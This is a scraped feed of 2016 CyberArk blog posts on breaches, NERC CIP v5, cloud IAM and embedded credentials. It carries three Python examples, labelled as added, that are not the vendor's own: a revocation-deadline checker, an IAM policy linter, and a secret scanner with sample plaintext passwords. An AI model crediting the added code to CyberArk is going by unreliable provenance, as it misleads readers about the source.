
Although there is still a lot of speculation surrounding the cyberattack, here is what we know so far: 

Krebs on Security reports that Wendy’s was notified of a pattern of suspicious behavior on credit cards that were used at various restaurant locations. Wanting to be proactive in solving the problem, Wendy’s immediately hired a cybersecurity firm to do some digging and figure out what exactly happened.

Initially, it was thought that credit cards used at US Midwest locations were the only ones compromised, but it was soon discovered that cards used on the East Coast also suffered fraudulent charges. Although the breach has yet to be officially confirmed, it is looking pretty likely that the company was the victim of a hack.

Wendy’s is investigating transactions that occurred late last year, so it doesn’t look like this is the type of cyberattack dating back years. Customers who have used their credit or debit cards at Wendy’s are urged to keep a close eye on their credit card statements, and not wait until the end of the month to review their charges. Especially for fraudulent charges on debit cards, it can be very difficult to actually get your money back, so a prompt response is crucial.

Wendy’s should be applauded for its quick reaction and handling of the potential breach. They hired cybersecurity experts immediately to investigate the issue, not wanting it to spiral too far out of control. Although their response plan seems stellar, their overall security clearly isn’t. Wendy’s was not aware of the potential breach in the first place; they were alerted by someone else. The security team needs to have a better system in place so they are made immediately aware of such suspicious activity. Hopefully a revamp of their security protocols becomes part of their response plan as we learn more about what actually happened.

Although enough details haven’t been released about the breach to know exactly what happened, it is no secret that POS devices are attractive to hackers. Since they are meant to get sales done as quickly as possible, security isn’t always the top concern. Therefore, they can be relatively easy to hack. Restaurants are an attractive victim for hungry hackers, as they tend to store an abundance of information on their POS devices.

As if the 930 calories in the Baconator weren’t enough to deter you from the drive-through, maybe this will help you stick to your New Year’s resolution. Want to make your enterprise more secure in 2016? Check out our Secrets Management Checklist, and check security off of your to-do list.

 

]]>
Webinar: Learn How CyberArk Can Help Energy Companies Manage Risk and Meet NERC CIP v5 Recommendations https://www.cyberark.com/blog/webinar-learn-cyberark-can-help-energy-companies-manage-risk-meet-nerc-cip-v5-recommendations/ Fri, 29 Jan 2016 15:22:14 +0000 https://www.cyberark.com/blog//

Meeting regulations doesn’t necessarily equate to operating securely. It’s necessary to build security on top of requirements according to the level of risk. When it comes to protecting critical IT and OT systems, certain organizations have increased efforts to lead the way in developing and implementing regulations that help critical infrastructure companies to adopt a strong security posture.

The North American Electric Reliability Corporation, for example, has established the Critical Infrastructure Protection (CIP) program to improve the North American power systems’ security from physical and cyber threats. Specifically, NERC CIP v5 incorporates key requirements based on the National Institute of Standards and Technology (NIST) Risk Management Framework to help registered entities (utilities and other power facilities) achieve operations reliability excellence. This reliability in turn improves the cyber security posture for the Bulk-Power System (the grid).

Three key requirements of note:

  1. Registered Entities are now required to enforce authentication of interactive user access and to identify individuals who have authorized access to shared accounts. They also must implement strong passwords and change known default passwords per cyber asset capability. (CIP-007-5 R5 – Systems Security Management – Access Control)
  2. The use of an intermediate system is now required, so that cyber assets initiating interactive remote access do not directly access the applicable cyber asset within the Electronic Security Perimeter (ESP). Entities must also utilize encryption that terminates at the intermediate system and use multi-factor authentication for all interactive remote access sessions. (CIP-005-5 R2 – Electronic Security Perimeter(s) – Interactive Remote Access Management)
  3. Entities must remove an individual’s interactive remote access within 24 hours of termination, and the removal of an individual’s access to the designated storage locations must be completed by the end of the next calendar day after termination. (CIP-004-5.1 R5 – Personnel & Training – Access Revocation)
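The two revocation deadlines in the third requirement are easy to state and easy to miss in practice, because one is a rolling 24-hour window and the other is tied to the calendar day. The following is an added example, not code from the original post or from CyberArk, of an audit check that evaluates termination records against both deadlines. The record field names, the fixed UTC-5 local time zone and the four sample records are all constructed for the example.

```python
# Added example, not code from the original post or from CyberArk: a small audit
# check for the two CIP-004-5.1 R5 revocation deadlines. Record field names,
# the fixed UTC-5 offset and the sample records are assumptions for the demo.
from datetime import datetime, timedelta, time, timezone
from typing import Dict, List, Optional

# Assumption: the registered entity keeps its calendar day in a fixed UTC-5 zone.
LOCAL_TZ = timezone(timedelta(hours=-5))


def remote_access_deadline(terminated_at: datetime) -> datetime:
    """Interactive remote access must be gone within 24 hours of termination."""
    return terminated_at + timedelta(hours=24)


def storage_access_deadline(terminated_at: datetime) -> datetime:
    """Storage-location access must be gone by the end of the next calendar day."""
    local = terminated_at.astimezone(LOCAL_TZ)
    next_day = local.date() + timedelta(days=1)
    return datetime.combine(next_day, time(23, 59, 59), tzinfo=LOCAL_TZ)


def check_revocation(record: Dict) -> Dict:
    """Evaluate one termination record; a missing removal timestamp is a failure."""
    t = record["terminated_at"]
    remote_removed: Optional[datetime] = record.get("remote_access_removed_at")
    storage_removed: Optional[datetime] = record.get("storage_access_removed_at")
    remote_due = remote_access_deadline(t)
    storage_due = storage_access_deadline(t)
    return {
        "user": record["user"],
        "remote_access_ok": remote_removed is not None and remote_removed <= remote_due,
        "storage_access_ok": storage_removed is not None and storage_removed <= storage_due,
        "remote_deadline": remote_due,
        "storage_deadline": storage_due,
    }


def audit(records: List[Dict]) -> List[str]:
    """Return the users whose access removal missed at least one deadline."""
    return [
        r["user"]
        for r in map(check_revocation, records)
        if not (r["remote_access_ok"] and r["storage_access_ok"])
    ]


def _local(y, m, d, hh, mm) -> datetime:
    return datetime(y, m, d, hh, mm, tzinfo=LOCAL_TZ)


# Constructed sample data: four terminations from a hypothetical HR feed.
SAMPLE_RECORDS = [
    {   # removed promptly: compliant on both counts
        "user": "alice",
        "terminated_at": _local(2016, 3, 1, 16, 30),
        "remote_access_removed_at": _local(2016, 3, 1, 18, 0),
        "storage_access_removed_at": _local(2016, 3, 2, 17, 0),
    },
    {   # remote access lingered 24h30m: misses the 24-hour deadline
        "user": "bob",
        "terminated_at": _local(2016, 3, 1, 16, 30),
        "remote_access_removed_at": _local(2016, 3, 2, 17, 0),
        "storage_access_removed_at": _local(2016, 3, 2, 23, 0),
    },
    {   # late-evening termination: storage deadline is still end of 2016-03-02
        "user": "carol",
        "terminated_at": _local(2016, 3, 1, 23, 30),
        "remote_access_removed_at": _local(2016, 3, 2, 9, 0),
        "storage_access_removed_at": _local(2016, 3, 3, 8, 0),
    },
    {   # storage access never removed at all
        "user": "dave",
        "terminated_at": _local(2016, 3, 1, 9, 0),
        "remote_access_removed_at": _local(2016, 3, 1, 10, 0),
        "storage_access_removed_at": None,
    },
]

if __name__ == "__main__":
    for result in map(check_revocation, SAMPLE_RECORDS):
        print(result["user"],
              "remote ok" if result["remote_access_ok"] else "remote LATE",
              "storage ok" if result["storage_access_ok"] else "storage LATE")
    print("non-compliant:", audit(SAMPLE_RECORDS))
```

The carol record is the case worth noticing: a termination logged at 23:30 leaves only about 24 hours for the storage-location revocation, not 48, because the clock is the calendar day and not the termination timestamp. A real deployment would feed this from the HR termination feed and the PAM audit log rather than hand-written records.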

The North American Electric Reliability Corporation has recognized the key role that privileged accounts play in advanced external and internal cyber-attacks, especially as they enable users to initiate interactive remote access sessions to critical cyber assets. The NERC CIP v5 requirements on privileged account security ensure that entities have accountability for every use of privileged and shared accounts as well as secure remote access for external vendors with “over-the-shoulder” real time monitoring. Additionally, the standard has requirements related to privileged session isolation in order to keep credentials from being exposed, while securing privileged credentials in a tamper-proof vault.

Securing privileged accounts is not only critical in order to meet NERC CIP v5, but it is also an effective way to reduce the risk of cyber-attacks. Privileged accounts are extremely useful to malicious actors, as they allow access to critical assets and the opportunity to roam the system, in many cases undetected. Privileged session isolation and monitoring mitigates the risks associated with unauthorized users exploiting accounts that access critical systems. These measures also keep malware that could be present on the user’s endpoint contained.

The NERC CIP v5 has raised the bar in the cyber security regulatory world by improving on many basic cyber “hygiene practices” that give organizations a strong starting point in their journey to implementing a holistic risk-based approach to securing critical assets. NERC CIP v5 standard enforcement begins on April 1, 2016.

Watch our recorded webinar (16 mins): CyberArk and NERC CIP v5 compliance to learn how you can meet all the privileged accounts related requirements.

]]>
DataInformed- How to Create Your Scalable Data Security Plan https://www.cyberark.com/blog/datainformed-how-to-create-your-scalable-data-security-plan/ Fri, 29 Jan 2016 17:04:00 +0000 https://cyberarkvx2.wpengine.com/blog/datainformed-how-to-create-your-scalable-data-security-plan/  

Our CEO, Elizabeth Lawler, had the opportunity to write a piece for DataInformed. In the post, Elizabeth discusses the true impact of data breaches and their seemingly never ending repercussions.  As data breaches are costly, and diminish a company’s reputation, taking preventative measures to mitigate risk seems like the best strategy.

In the piece, Elizabeth outlines 5 necessary steps for creating a scalable data security plan. These 5 initiatives are aimed at making the enterprise more secure without compromising speed and innovation. Security should be a cross-departmental concern. By reframing security as a company-wide item, and having open and honest conversations about the security agenda, you will be closer to meeting your compliance goals.

Elizabeth also discusses how important it is to understand that security is an iterative process. Things are never perfect the first time; you must turn your efforts into a process, understanding what works and what doesn’t, and making the plan better every single time.

Success metrics, RBAC, and audit are also discussed, Elizabeth outlining the way these things can help create a cohesive and extendable security plan that all internal stakeholders will get behind and implement.

Take a look at all of Elizabeth’s security advice here, and, as always, don’t forget to let us know what you think.

 

]]>
Gartner: Cloud Breaches are Almost Certainly The Customer’s Fault https://www.cyberark.com/blog/gartner-cloud-breaches-are-almost-certainly-the-customers-fault/ Thu, 28 Jan 2016 14:50:00 +0000 https://cyberarkvx2.wpengine.com/blog/gartner-cloud-breaches-are-almost-certainly-the-customers-fault/  

As more enterprises embrace AWS, the industry analyst firm sounds a note of caution: security and compliance is still your responsibility no matter how well the cloud service provider does the job of securing their infrastructure.

In what is a pretty eye-opening and cautionary prognostication, the industry analyst firm Gartner has warned that through 2020, 95% of cloud security failures will be the customer’s fault. What does this mean in practical terms for the growing number of risk-conscious organizations making Amazon Web Services an integral component of their IT services delivery strategy?

For many large organizations that still have substantial misgivings about the risks posed by cloud services, this prediction would seem counter-intuitive. Gartner, of course, is not suggesting that customers should simply assume the best of their cloud service provider, and “that using a cloud means that whatever they do within that cloud will necessarily be secure”.

Instead, Gartner is restating the fundamental challenge of the cloud’s shared responsibility model. But the firm is pointing out, rather emphatically, that while cloud service providers have done a good job of holding up their end of the bargain, customers are still coming to terms with the fact that “secure use of public clouds requires explicit effort on the part of the cloud customer.”

Effectively speaking, the service provider is responsible for securing the infrastructure. How the infrastructure is used, and who – and what – gets access and permissions remains the customer’s responsibility. Without adequate controls in place, it’s far more likely that a security incident, breach, or compliance failure will be the customer’s fault rather than that of the service provider.

So what are the practical implications and the logical conclusions from the prediction, especially for AWS customers? What value can tools like AWS Identity and Access Management (IAM), or even Security Monkey for AWS provide for ensuring security and compliance? Gartner sounds another note of caution:

“The characteristics of the parts of the cloud stack under customer control can make cloud computing a highly efficient way for naive users to leverage poor practices, which can easily result in widespread security or compliance failures.”

In other words, cloud service providers can only provide the tools. The customers have to bring the policy.

For AWS customers, access and authorization policy is in large part a question of who or what gets access to the AWS Management Console and how AWS IAM roles and rules are maintained to ensure consistency. Just as in on-premise datacenters, who gets access to administrator accounts and their associated authorizations is a key security and compliance consideration.

For many Conjur customers, the first point of departure is ensuring that AWS IAM users, roles, and rules are based on existing policy logic and identity data stores (notably but not exclusively, Microsoft Active Directory). Synchronizing with existing data and policy stores ensures that AWS identities are not managed in a silo, and that when users leave or are de-provisioned, they don’t end up keeping their AWS credentials.

The next element is ensuring that access to the AWS Management Console and to privileged systems running in AWS uses strong authentication. For the systems themselves, that means SSH with managed private keys, brokered through a single hardened host rather than opened directly to every instance. This type of deployment is commonly referred to as an SSH bastion host.

However, a new set of challenges presents itself when customers take the next series of steps. Securing access to the AWS Management Console is complicated by the need to enable developer access, for example for moving code into production, which can easily result in violating the principle of least privilege. In this sense, AWS usage illustrates the need to strike a balance between operational flexibility and security and compliance requirements.
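The Gartner quote about “naive users leveraging poor practices” usually shows up concretely as an IAM policy: a developer needs to deploy, and the quickest answer is an Allow on every action and every resource with no MFA condition. The following is an added example, not code from the original post or from Conjur, of a small linter that flags those habits in an IAM policy document, run over one weak policy and one scoped policy. Both policies, the account ID, ARNs and statement IDs are constructed placeholders; the check is a simplification of what a real policy review would do, not an AWS tool.

```python
# Added example, not code from the original post or from Conjur/CyberArk: a
# small linter for AWS IAM policy documents that flags wildcard actions,
# wildcard resources and missing MFA conditions. The policies, account ID,
# ARNs and statement IDs below are constructed placeholders.
import json
from typing import Dict, List, Tuple

Finding = Tuple[str, str]  # (statement id, finding code)

# Weak policy: a "developers need to deploy" request answered with full admin.
WEAK_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "DevFullAccess", "Effect": "Allow", "Action": "*", "Resource": "*"},
        {"Sid": "S3Everything", "Effect": "Allow", "Action": "s3:*",
         "Resource": "arn:aws:s3:::deploy-artifacts/*",
         "Condition": {"Bool": {"aws:MultiFactorAuthPresent": "true"}}},
    ],
})

# Scoped policy: the same deployment task limited to one deployment group,
# MFA required, and read-only discovery actions allowed on "*".
SCOPED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "DeployWebApp", "Effect": "Allow",
         "Action": ["codedeploy:CreateDeployment", "codedeploy:GetDeployment"],
         "Resource": "arn:aws:codedeploy:us-east-1:123456789012:deploymentgroup:web-app/prod",
         "Condition": {"Bool": {"aws:MultiFactorAuthPresent": "true"}}},
        {"Sid": "ReadOnlyDiscovery", "Effect": "Allow",
         "Action": ["ec2:DescribeInstances", "codedeploy:ListDeployments"],
         "Resource": "*",
         "Condition": {"Bool": {"aws:MultiFactorAuthPresent": "true"}}},
    ],
})

# Actions for which Resource "*" is normal because they are read-only.
READ_ONLY_PREFIXES = ("Describe", "List", "Get")


def _as_list(value) -> List:
    """IAM allows a bare string or a list for Action/Resource; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _requires_mfa(condition: Dict) -> bool:
    """True if the statement only applies when the caller authenticated with MFA."""
    for operator in ("Bool", "BoolIfExists"):
        flag = condition.get(operator, {}).get("aws:MultiFactorAuthPresent")
        if flag is not None and str(flag).lower() == "true":
            return True
    return False


def _is_read_only(actions: List[str]) -> bool:
    """All actions are Describe*/List*/Get*, so a wildcard resource is tolerated."""
    return all(":" in a and a.split(":", 1)[1].startswith(READ_ONLY_PREFIXES)
               for a in actions)


def lint_policy(policy_json: str) -> List[Finding]:
    """Return (sid, code) findings for every Allow statement that over-grants."""
    doc = json.loads(policy_json)
    findings: List[Finding] = []
    for i, stmt in enumerate(_as_list(doc.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        sid = stmt.get("Sid", "Statement[%d]" % i)
        if "NotAction" in stmt:
            findings.append((sid, "not-action"))  # allows everything not listed
        actions = [str(a) for a in _as_list(stmt.get("Action", []))]
        if any(a == "*" or a.endswith(":*") for a in actions):
            findings.append((sid, "wildcard-action"))
        resources = [str(r) for r in _as_list(stmt.get("Resource", []))]
        if "*" in resources and not _is_read_only(actions):
            findings.append((sid, "wildcard-resource"))
        if not _requires_mfa(stmt.get("Condition", {})):
            findings.append((sid, "no-mfa-condition"))
    return findings


if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("scoped", SCOPED_POLICY)):
        print(name, lint_policy(policy) or "clean")
```

The read-only carve-out is deliberate: flagging every `Resource: "*"` produces noise on Describe and List calls that genuinely have no resource-level scoping, and noisy linters get ignored. The S3Everything statement shows why the service-level wildcard `s3:*` is checked separately from the bare `*`: it has an MFA condition and a narrow bucket prefix, yet still grants delete and ACL changes a deploy job never needs.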

A closely related authorization challenge to developer access is how machine identities are managed in AWS environments. Machine identities (applications, services and APIs) also need their permissions managed. In order to scale effectively, and to secure ephemeral infrastructure, a new approach is needed.

Conjur is designed to tackle these challenges effectively, especially managing authorization for machine identities in highly dynamic environments.

The Conjur platform directly addresses those elements that customers need to avoid becoming one of Gartner’s statistics:

  • Manage the complexity of IAM permissions and align cloud service provider tooling with internal policy and identity data sources
  • Ensure consistent authorization policies are maintained for access to secrets based on role, with activity logged and audited
  • Enable developer access to the AWS admin console while still adhering to least privilege access
  • Automate governance for ephemeral, short-lived machine identities
  • Broker access and enforce strong authentication for remote users to private instances and privileged systems running in AWS

 

]]>
Conjur Accelerates Adoption of Automated Infrastructure with New Software Release https://www.cyberark.com/blog/conjur-accelerates-adoption-of-automated-infrastructure-with-new-software-release/ Wed, 27 Jan 2016 13:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-accelerates-adoption-of-automated-infrastructure-with-new-software-release/  

Press Release:

Conjur Version 4.6 Delivers Identity, Authorization and Audit Capabilities for Enterprises that Require Compliance and Security While Enabling Greater Velocity

WALTHAM, Mass.– Jan. 27, 2016 – Conjur, Inc., provider of security orchestration software, has released significant product enhancements to assist highly regulated industries in their transition to the cloud. As enterprises migrate their infrastructure and application development to the cloud, the need for speed and security increases. Conjur Version 4.6 delivers meaningful improvements for its core security platform, including easy multi-region Amazon KMS integration, expiration of secrets and a new policy specification that delivers easier integration with machine-generation and policy workflows. These developments empower highly regulated enterprises to grow and scale their cloud-based, automated infrastructures while maintaining their security and compliance obligations.

“Conjur provides a flexible solution that allows customers to solve their security dilemmas without sacrificing velocity or productivity,” said Mitch Haile, Vice President of Products at Conjur. “Through a centralized authorization service exposed through APIs, Conjur enables enterprises to apply a consistent set of policies for production, staging and test environment access throughout the entire software development cycle. These latest enhancements meet the requirements for the scalable, enterprise-grade secret management solution for organizations in highly regulated industries.”

Conjur Version 4.6 enables enterprises to automate infrastructure securely by providing the following:

  • An SSH jump server to control access to cloud infrastructure, including Amazon AWS, Microsoft Azure and others
  • Simplified, centrally managed security policies across complex AWS deployments, including multiple AWS accounts, availability zones and hybrid architectures
  • Cloud-independent identity for jobs, containers and VMs
  • Consistent policy across large organizations, with security controls scaled through a delegated administration model
  • Enterprise-grade secrets management that eliminates secrets from source code and configuration files
  • Comprehensive audit and reporting that integrates with third-party systems of record

Conjur supports numerous platforms and tools including Puppet, Docker and Chef. Conjur Version 4.6 supports Red Hat Enterprise Linux, CentOS and Ubuntu for the host platform. The user interface includes new management features for secrets, hosts, LDAP integration and policy improvements.

Conjur 4.6 is available immediately by contacting Conjur at www.conjur.net.

About Conjur
For enterprises that need to protect their infrastructure, Conjur provides proactive security with comprehensive authorization for every cloud, VM, container, service, job and user. Conjur helps companies such as Netflix, Box, and Puppet Labs solve critical operational, compliance, and security challenges that originate in modern automated infrastructure. Headquartered in Waltham, Massachusetts, Conjur is funded by Avalon Partners and Amplify Partners. Visit www.conjur.net and follow @conjurinc on Twitter.

PR Contact:
Tracy Wemett
BroadPR
+1-617-868-5031

All trademarks recognized.

 

]]>
3 Security Concerns All Financial Services Companies Should Address https://www.cyberark.com/blog/3-security-concerns-all-financial-services-companies-should-address/ Tue, 26 Jan 2016 19:29:00 +0000 https://cyberarkvx2.wpengine.com/blog/3-security-concerns-all-financial-services-companies-should-address/  

As enterprise IT teams grow, the threat surface for attacks increases. As hackers get smarter in the way they access systems, businesses are quickly realizing that security is one of the most important, and potentially devastating, challenges they face. It used to be that only security teams were concerned about cyber safety; recently, however, it has quickly become a priority on the C-suite agenda. A survey of 1,409 CEOs around the world found that 61% are concerned about cybersecurity and 55% are troubled by consumers’ waning trust in businesses.

In its recently released Global State of Information Security Survey 2016, PwC found that for financial services firms, cybersecurity is a chief concern. The piece discusses some of the key issues they face. Although some of the statistics on breaches seem scary, and all of the publicized hacks make us feel as though no one takes our private data seriously, this study shows that we are headed in the right direction. Enterprises are finally understanding that security cannot be an afterthought and seem to recognize where the vulnerabilities lie within their organizations. It is important that business leaders understand the way teams, internal processes, and external factors can potentially impact cybersecurity; in being aware of these things, a strategy can be created to help mitigate risk.

Here are 3 Security Concerns Financial Services Should Be Aware Of

1. Most breaches occur within the organization

Of the surveyed companies, PwC found that 59% have an employee training and awareness program. As most breaches occur due to employee negligence, these new training programs are crucial in helping team members to understand and implement the appropriate security best practices. Knowing where vulnerabilities lie within the organization, and training teams to avoid them, is crucial to mitigating future risk.

2. Third-party vendors are risky

Third-party vendors pose a security risk. Although these organizations likely set security standards of their own, they might not meet the rigorous ones that you set for your own organization. Additionally, it is very difficult to be sure they are actually following their security best practices. Just as a breach can occur within your organization due to employee negligence, breaches can also occur at third-party vendors for the same reason.

3. Consumers are worried

73% of consumers in the UK said they are worried about how data is being handled by the businesses that gather it. This statistic comes as no surprise, as the news is bombarded with stories about the latest data hacks. Companies want to make money, and they cannot do so if customers continue to lose trust and take their business elsewhere. This monetary impact has led to a big change within organizations. 59% of those companies surveyed by PwC have a CISO who is in charge of security. Having someone whose sole responsibility is to oversee, manage, and implement new security measures is a huge step in the right direction.

Thankfully, there are solutions that help make these concerns less scary and more approachable. The more sensitive information an organization holds, the bigger a target it is. However, having security woven into the organization, instead of serving as a bottleneck, will allow businesses to continue operating efficiently while keeping data safe.
Addressing Security Risks of Embedded Credentials https://www.cyberark.com/blog/addressing-security-risks-embedded-credentials/ Mon, 25 Jan 2016 18:38:33 +0000 https://www.cyberark.com/blog//

There’s an elephant in the room. A growing number of organizations proactively mitigate cyber security risks by improving privileged access controls, yet many still have powerful accounts across their environment for which the credentials have never been changed.  I’m referring to the commercial off-the-shelf (COTS) applications that often require the same access to privileged accounts as IT admin users. The privileged credentials accessed by applications are typically not well maintained, managed or secured. Awareness of the security risks associated with embedded credentials is growing.

Applications that use embedded credentials can be very attractive targets for adversaries. Often these applications require highest-level privileges to perform intended functions such as resetting a service, conducting a vulnerability scan or initiating a back-up. This means the accounts also have extensive access to sensitive systems and data.  The associated security risks can be great – especially when you consider that many organizations have thousands of embedded credentials across their environment, and each represents a potential pathway for attackers – increasing the magnitude of risk. As Jim Connelly, CISO of Lockheed Martin points out, “If [adversaries] get a hold of an over-privileged account, they’ll run through the environment like a brushfire.”

Dealing with credentials used by applications can be one of the most challenging aspects of securing privileged accounts, since mitigation often involves refactoring a wide range of applications – from vulnerability management and IAM/governance tools to DevOps, data management and cloud tools. Quite a formidable task if automation mechanisms are not in place.

I admire the way leading enterprise CISOs address such challenges. They don’t stick their heads in the sand, nor do they frame the issue as a binary, i.e. “We can’t do anything about this problem” or “There is only one right way to solve the problem.” As part of the CISO View industry initiative, CyberArk released research entitled “The Balancing Act: The CISO View on Improving Privileged Access Controls” to provide a roadmap for companies to address security holistically – including overcoming the embedded credential conundrum. Within the report, 12 security leaders describe a meaningful range of options for dealing with embedded passwords in applications. Some methods require coding, some don’t. Some focus on prevention, others detection. Some use compensating controls.

There are also three baseline best practices that every organization should consider implementing initially to better protect credentials used by applications and scripts:

  1. The credentials for the account should be stored securely. If an application obtains an account’s credential from a configuration file, an attacker can easily read it. Instead, reconfigure applications to call the password from an encrypted password vault.
  2. The account password or SSH key should be changed regularly. Changing a credential used by applications is often a sensitive issue, especially if it has been used for so long that nobody knows what the effects of changing it will be. Weigh the value of changing a credential against the operational risk associated with changing it.
  3. The application should be designed using the principle of least privilege. For example, an application that performs backups should not need permissions to install software.
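As an added example (not from the CISO View report or from CyberArk's own tooling), the following Python script supports the first two practices above: it scans configuration text for credentials stored in the clear, so they can be found and moved into a vault, reporting only masked values so the report itself does not leak the secret, and it checks a credential's last rotation date against a maximum age. The sample configuration, the detection patterns and the indirection markers (`${VAR}`, `vault:`, `conjur:`) are constructed for this example and should be tuned to your own naming conventions.

```python
import re
from datetime import date, timedelta
from typing import List, NamedTuple


class Finding(NamedTuple):
    line_no: int   # 1-based line in the scanned text
    kind: str      # key_value | url_credential | private_key
    masked: str    # masked secret, safe to put in a report


# Constructed detection patterns for credentials commonly embedded in config files.
_KEY_VALUE = re.compile(
    r"""(?ix)
    \b(password|passwd|pwd|secret|api[_-]?key|token)\b   # setting name
    \s*[:=]\s*
    ["']?(?P<value>[^"'\s]{4,})["']?                      # literal value
    """
)
# scheme://user:password@host  (credential embedded in a connection URL)
_URL_CREDS = re.compile(r"(?i)\b[a-z][a-z0-9+.-]*://[^/\s:@]+:(?P<value>[^@\s]+)@")
_PRIVATE_KEY = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")
# Values that are references (environment variable, placeholder, vault path,
# already-masked value) rather than the secret itself: not a finding.
_INDIRECT = re.compile(r"(?i)^(\$\{?\w+\}?|<[^>]+>|vault:|conjur:|\*+)")


def mask(value: str) -> str:
    """Keep only the first and last two characters so a reader can recognise the value."""
    if len(value) <= 4:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 4) + value[-2:]


def find_embedded_credentials(text: str) -> List[Finding]:
    """Return one Finding per line that appears to carry a literal credential."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith(("#", ";", "//")):
            continue  # blank or comment line
        if _PRIVATE_KEY.search(line):
            findings.append(Finding(line_no, "private_key", "<PEM block>"))
            continue
        m = _URL_CREDS.search(line)
        if m:
            findings.append(Finding(line_no, "url_credential", mask(m.group("value"))))
            continue
        m = _KEY_VALUE.search(line)
        if m and not _INDIRECT.match(m.group("value")):
            findings.append(Finding(line_no, "key_value", mask(m.group("value"))))
    return findings


def rotation_overdue(last_rotated: date, max_age_days: int, today: date) -> bool:
    """Practice 2: flag an application credential that has outlived the rotation policy."""
    return today - last_rotated > timedelta(days=max_age_days)


# Constructed sample: a backup agent's configuration file.
SAMPLE_CONFIG = """\
# constructed sample: backup agent configuration
[database]
host = db01.internal.example
user = backup_svc
password = Winter2015!
[storage]
endpoint = https://backup_svc:S3cretKey@storage.internal.example/bucket
[vault]
# indirection, not a secret: value fetched at runtime
api_key = ${BACKUP_API_KEY}
"""

if __name__ == "__main__":
    for f in find_embedded_credentials(SAMPLE_CONFIG):
        print(f"line {f.line_no}: {f.kind} ({f.masked})")
    print("rotation overdue:",
          rotation_overdue(date(2015, 1, 1), 90, date(2016, 1, 25)))
```

Running the script on the sample reports the plaintext database password on line 5 and the credential embedded in the storage URL on line 7, while the `${BACKUP_API_KEY}` reference is correctly ignored; the two literal values are what would be moved into the vault before the file is checked in or deployed.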

This kind of pragmatic problem solving is what you’ll find featured in the CISO View report. The report also highlights ways to make security more personal for stakeholders, such as IT administrators and DBAs, across your enterprise. We’ll explore that topic further in another article. Download the full report.
Time to Check-Out…Hyatt Hotels Hacked https://www.cyberark.com/blog/time-to-check-out-hyatt-hotels-hacked/ Wed, 20 Jan 2016 16:33:00 +0000 https://cyberarkvx2.wpengine.com/blog/time-to-check-out-hyatt-hotels-hacked/  

There is nothing more relaxing than a few days away from home to sit back, relax, and unwind. If you decided to golf, hit the spa, or grab a bite to eat while enjoying some time off at a Hyatt Hotel, you might have taken more than just vacation selfies home with you. Just before Christmas, Hyatt announced a breach in their systems, though the details surrounding the hack were largely unclear. Now, weeks later, we are finally getting some answers… and it doesn’t look good.

According to Hyatt representatives, 250 hotels around the world were affected by the breach. Wondering if your holiday spot was hacked? Take a look at the comprehensive list.

The credit card information was largely taken between August 13, 2015 and December 8, 2015. A few accounts, however, were hacked right after July 30, 2015, so if you stayed at one of the breached hotels during that time, your information might have been exposed.

Malware designed to collect names, credit card numbers, expiration dates, and security codes was found in the hotels’ payment processing system. All of this information was leaked, so it is important to take a look at your credit card statements for fraudulent charges. Even if you don’t see anything, it is a good idea to cancel the card and get a new one, as any hacker who has this info can easily make fraudulent online purchases on your credit card. Hyatt says that their restaurants were primarily targeted, but a few payment details from POS devices used at spas, golf courses, parking areas, and front desks were also exposed.

The exact number of customers affected has not been released, however, those whose information was taken will receive free credit monitoring for a year.

As most large retailers have made the switch to chip cards, it seems hackers are focusing on the easy targets. Since hotels process millions of transactions per day, it isn’t surprising that they are on most hackers’ radar. As these events become increasingly common, let’s hope that this breach opens up deeper conversations among enterprises about data security, conversations that are ultimately aimed at changing security systems and protocols. In the meantime, we might be better off avoiding the fancy restaurants and golf courses and staying at a local B&B… or pitching a tent in our own backyard.
Hindsight and Cyber Security Predictions for 2016 https://www.cyberark.com/blog/hindsight-cyber-security-predictions-2016/ Tue, 19 Jan 2016 14:57:50 +0000 https://www.cyberark.com/blog//

The arrival of the New Year provides a timely occasion for the security community to reflect upon the lessons learned over the past year and examine the challenges – and opportunities – ahead.

Compromised privileged accounts and credentials continued to be a popular pathway for attackers – the attack on the U.S. Office of Personnel Management is an example of one with extensive and ongoing fallout. The attack put privilege front and center – not only in the press, but also with the U.S. federal CIO, who issued the now-familiar “30 Day Sprint” that prioritized privileged account security, among other guidance.

What changed last year was a significant uptick in awareness – across IT and executive teams – around privileged account security. Our annual Threat Landscape survey found that 61 percent of respondents cited privileged account takeover as the most difficult stage of a cyber attack to mitigate, up from 44 percent from the year prior. Additionally, a 2015 retrospective article from Dark Reading explored 15 cyber security lessons that should have been learned in 2015. Among the lessons – the critical need for organizations to bolster privilege account management practices. Reporter Sara Peters wrote, “Study, after study, after study this year revealed that privileged accounts need to be better managed. It isn’t just that the credentials themselves are too weak, but sometimes they’re poorly monitored, too widely shared, and they’re not efficiently revoked when employees leave an organization.” We agree!

Looking Ahead

While we expect privileged account security to continue to be recognized as an enterprise security priority, there are a number of other trends to watch in the coming year. While not an exhaustive list, we expect these issues to get attention in the coming months.

  • Hitting Close to Home, Data Breaches Will Get Increasingly Personal. The recent VTech data breach highlights consumer privacy issues in a very powerful way. The breach exposed personal information, photos and chat logs of 6.4 million children – and prompted parents around the globe to take a hard look at the seemingly innocuous, Internet-connected toys their children have access to. Within weeks of the breach, headlines emerged revealing vulnerabilities in other popular children’s toys, including Hello Barbie and Hello Kitty. Despite this jarring wake-up call, an Altimeter study indicates the vast majority (87 percent) of consumers still don’t know what the term “Internet of Things” even means. This lack of awareness will need to change quickly. While consumers should properly educate themselves on the potential dangers of Internet-connected devices – from tablets to toys to smart thermostats – it is the responsibility of manufacturers to design with security in mind, and not put time-to-market ahead of protecting their customers. Manufacturers also need to put in place stronger controls for protecting the data that is collected from these devices and stored.
